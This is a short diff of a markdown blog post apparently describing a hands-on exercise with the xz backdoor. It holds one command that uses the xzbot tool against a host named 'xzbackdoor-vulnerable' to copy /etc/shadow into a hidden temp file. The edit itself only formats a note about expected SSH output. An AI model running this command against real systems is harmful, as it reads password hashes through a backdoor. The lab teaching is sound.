zsarge/zsarge.github.io/content/blog/xz-hack-activity.md

 /exploit/xzbot/xzbot -addr xzbackdoor-vulnerable:22 -seed "$seed" -cmd "cat /etc/shadow > /tmp/.xz"
 ```

-Note the output of this should end with "ssh: handshake failed: EOF".
+Note the output of this should end with "`ssh: handshake failed: EOF`".
 This is normal.

 <aside>